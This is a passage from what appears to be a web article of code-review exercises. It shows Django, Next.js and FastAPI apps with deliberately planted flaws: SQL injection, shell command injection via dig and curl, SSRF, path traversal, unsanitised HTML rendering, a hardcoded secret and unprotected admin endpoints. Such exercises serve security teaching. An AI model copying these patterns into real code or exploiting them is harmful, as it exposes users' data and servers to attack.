class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span><span class="p">,</span> <span class="n">get_object_or_404</span> <span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span> <span class="kn">from</span> <span class="n">django.contrib.auth.models</span> <span class="kn">import</span> <span class="n">User</span> <span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">connection</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Report</span><span class="p">,</span> <span class="n">UserProfile</span> <span class="k">def</span> <span class="nf">set_avatar</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">avatar_url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">avatar_url</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">user_id</span><span class="sh">'</span><span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">avatar_url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="n">upload_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">media/avatars</span><span class="sh">'</span><span class="p">,</span> <span class="sa">f</span><span class="sh">'</span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="s">_avatar.png</span><span class="sh">'</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">upload_path</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">)</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="n">profile</span><span class="p">.</span><span class="n">avatar_url</span> <span class="o">=</span> <span class="n">upload_path</span> <span class="n">profile</span><span class="p">.</span><span class="nf">save</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">avatar updated</span><span class="sh">'</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid method</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_reports</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">q</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, title, content FROM dashboard_report WHERE title LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">q</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span> <span class="p">)</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">results</span><span class="sh">'</span><span class="p">:</span> <span class="n">rows</span><span class="p">})</span> <span class="k">def</span> <span class="nf">get_report</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">report_id</span><span class="p">):</span> <span class="n">report</span> <span class="o">=</span> <span class="nf">get_object_or_404</span><span class="p">(</span><span class="n">Report</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="n">report_id</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span> <span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="nb">id</span><span class="p">,</span> <span class="sh">'</span><span class="s">title</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="sh">'</span><span class="s">content</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">content</span><span class="p">,</span> <span class="sh">'</span><span class="s">owner</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">owner</span><span class="p">.</span><span class="n">username</span> <span class="p">})</span> <span class="k">def</span> <span class="nf">run_diagnostic</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">target</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">target</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span> <span class="sa">f</span><span class="sh">'</span><span class="s">dig +short </span><span class="si">{</span><span class="n">target</span><span class="si">}</span><span class="sh">'</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span> <span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">output</span><span class="sh">'</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid method</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="k">def</span> <span class="nf">admin_users</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">users</span> <span class="o">=</span> <span class="n">User</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">values</span><span class="p">(</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">email</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">is_staff</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">users</span><span class="sh">'</span><span class="p">:</span> <span class="nf">list</span><span class="p">(</span><span class="n">users</span><span class="p">)})</span> </code></pre> </div> <p><strong><code>templates/dashboard.html</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;&lt;title&gt;</span>DevDash<span class="nt">&lt;/title&gt;&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">x-data=</span><span class="s">"dashboard()"</span> <span class="na">x-init=</span><span class="s">"init()"</span><span class="nt">&gt;</span> <span class="nt">&lt;div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">x-model=</span><span class="s">"avatarUrl"</span> <span class="na">placeholder=</span><span class="s">"Paste image URL..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">x-model=</span><span class="s">"userId"</span> <span class="na">placeholder=</span><span class="s">"User ID..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"setAvatar()"</span><span class="nt">&gt;</span>Update<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">x-model=</span><span class="s">"searchQuery"</span> <span class="na">placeholder=</span><span class="s">"Search..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"searchReports()"</span><span class="nt">&gt;</span>Search<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;div</span> <span class="na">x-html=</span><span class="s">"searchResults"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">x-model=</span><span class="s">"diagTarget"</span> <span class="na">placeholder=</span><span class="s">"Enter hostname..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"runDiagnostic()"</span><span class="nt">&gt;</span>Run<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;pre</span> <span class="na">x-text=</span><span class="s">"diagOutput"</span><span class="nt">&gt;&lt;/pre&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"//cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"</span> <span class="na">defer</span><span class="nt">&gt;&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h2> Exercise 5 — Django + Next.js (InvoiceHub) </h2> <p><strong>App:</strong> Billing platform with invoice management and file downloads</p> <p><strong><code>billing/views.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span><span class="p">,</span> <span class="n">FileResponse</span> <span class="kn">from</span> <span class="n">django.contrib.auth.models</span> <span class="kn">import</span> <span class="n">User</span> <span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">connection</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Invoice</span><span class="p">,</span> <span class="n">APIKey</span> <span class="k">def</span> <span class="nf">get_invoices</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">api_key</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">X-API-Key</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">key_obj</span> <span class="o">=</span> <span class="n">APIKey</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">api_key</span><span class="p">).</span><span class="nf">first</span><span class="p">()</span> <span class="n">owner_id</span> <span class="o">=</span> <span class="n">key_obj</span><span class="p">.</span><span class="n">owner_id</span> <span class="k">if</span> <span class="n">key_obj</span> <span class="k">else</span> <span class="bp">None</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, title, amount, pdf_filename FROM billing_invoice WHERE owner_id = </span><span class="si">{</span><span class="n">owner_id</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">invoices</span><span class="sh">'</span><span class="p">:</span> <span class="n">rows</span><span class="p">})</span> <span class="k">def</span> <span class="nf">download_invoice</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">filename</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">filepath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/invoices</span><span class="sh">'</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span> <span class="k">return</span> <span class="nc">FileResponse</span><span class="p">(</span><span class="nf">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">))</span> <span class="k">def</span> <span class="nf">health_check</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">host</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">host</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">localhost</span><span class="sh">'</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span> <span class="sa">f</span><span class="sh">'</span><span class="s">curl -s --max-time 3 </span><span class="si">{</span><span class="n">host</span><span class="si">}</span><span class="sh">'</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span> <span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">})</span> <span class="k">def</span> <span class="nf">get_invoice</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">invoice_id</span><span class="p">):</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, title, amount, pdf_filename, owner_id FROM billing_invoice WHERE id = </span><span class="si">{</span><span class="n">invoice_id</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sh">'</span><span class="s">title</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="sh">'</span><span class="s">amount</span><span class="sh">'</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="sh">'</span><span class="s">pdf_filename</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]})</span> <span class="k">def</span> <span class="nf">create_api_key</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="kn">import</span> <span class="n">secrets</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">user_id</span><span class="sh">'</span><span class="p">)</span> <span class="n">key</span> <span class="o">=</span> <span class="n">secrets</span><span class="p">.</span><span class="nf">token_hex</span><span class="p">(</span><span class="mi">32</span><span class="p">)</span> <span class="n">APIKey</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">key</span><span class="p">,</span> <span class="n">owner_id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">api_key</span><span class="sh">'</span><span class="p">:</span> <span class="n">key</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid method</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> </code></pre> </div> <p><strong><code>components/InvoiceDashboard.tsx</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">InvoiceDashboard</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">invoices</span><span class="p">,</span> <span class="nx">setInvoices</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">([]);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">searchHtml</span><span class="p">,</span> <span class="nx">setSearchHtml</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">host</span><span class="p">,</span> <span class="nx">setHost</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">loadInvoices</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">apiKey</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">api_key</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/invoices/</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">X-API-Key</span><span class="dl">'</span><span class="p">:</span> <span class="nx">apiKey</span> <span class="o">||</span> <span class="dl">''</span> <span class="p">}</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="nf">setInvoices</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">invoices</span><span class="p">);</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">searchInvoices</span> <span class="o">=</span> <span class="k">async </span><span class="p">(</span><span class="nx">query</span><span class="p">:</span> <span class="kr">string</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/invoices/?search=</span><span class="p">${</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="nf">setSearchHtml</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">checkHealth</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/admin/health/?host=</span><span class="p">${</span><span class="nx">host</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">downloadInvoice</span> <span class="o">=</span> <span class="p">(</span><span class="nx">filename</span><span class="p">:</span> <span class="kr">string</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="s2">`/api/invoices/download/?file=</span><span class="p">${</span><span class="nx">filename</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">loadInvoices</span><span class="si">}</span><span class="p">&gt;</span>Load Invoices<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">ul</span><span class="p">&gt;</span> <span class="si">{</span><span class="nx">invoices</span><span class="p">.</span><span class="nf">map</span><span class="p">((</span><span class="nx">inv</span><span class="p">:</span> <span class="kr">any</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">(</span> <span class="p">&lt;</span><span class="nt">li</span> <span class="na">key</span><span class="p">=</span><span class="si">{</span><span class="nx">inv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="p">&gt;</span> <span class="si">{</span><span class="nx">inv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="si">}</span> - $<span class="si">{</span><span class="nx">inv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="si">}</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="p">()</span> <span class="o">=&gt;</span> <span class="nf">downloadInvoice</span><span class="p">(</span><span class="nx">inv</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span><span class="si">}</span><span class="p">&gt;</span>Download PDF<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">li</span><span class="p">&gt;</span> <span class="p">))</span><span class="si">}</span> <span class="p">&lt;/</span><span class="nt">ul</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Search invoices..."</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">searchInvoices</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">dangerouslySetInnerHTML</span><span class="p">=</span><span class="si">{</span><span class="p">{</span> <span class="na">__html</span><span class="p">:</span> <span class="nx">searchHtml</span> <span class="p">}</span><span class="si">}</span> <span class="p">/&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">host</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setHost</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Health check host..."</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">checkHealth</span><span class="si">}</span><span class="p">&gt;</span>Check<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Exercise 6 — FastAPI + Nuxt.js (TeamCollab) </h2> <p><strong>App:</strong> Team collaboration platform with documents, webhooks, and file uploads</p> <p><strong><code>app/main.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Header</span><span class="p">,</span> <span class="n">UploadFile</span><span class="p">,</span> <span class="n">File</span><span class="p">,</span> <span class="n">Depends</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">FileResponse</span> <span class="kn">from</span> <span class="n">sqlalchemy.orm</span> <span class="kn">import</span> <span class="n">Session</span> <span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">text</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">httpx</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="sh">"</span><span class="s">teamcollab-secret-hardcoded-2024</span><span class="sh">"</span> <span class="n">UPLOAD_DIR</span> <span class="o">=</span> <span class="sh">"</span><span class="s">uploads</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">teamcollab.db</span><span class="sh">"</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="k">yield</span> <span class="n">conn</span> <span class="k">finally</span><span class="p">:</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/documents/search</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">search_documents</span><span class="p">(</span><span class="n">q</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">db</span><span class="p">:</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Connection</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">)):</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, title, content, owner_id FROM documents WHERE title LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">q</span><span class="si">}</span><span class="s">%</span><span class="sh">'</span><span class="s"> OR content LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">q</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span> <span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span 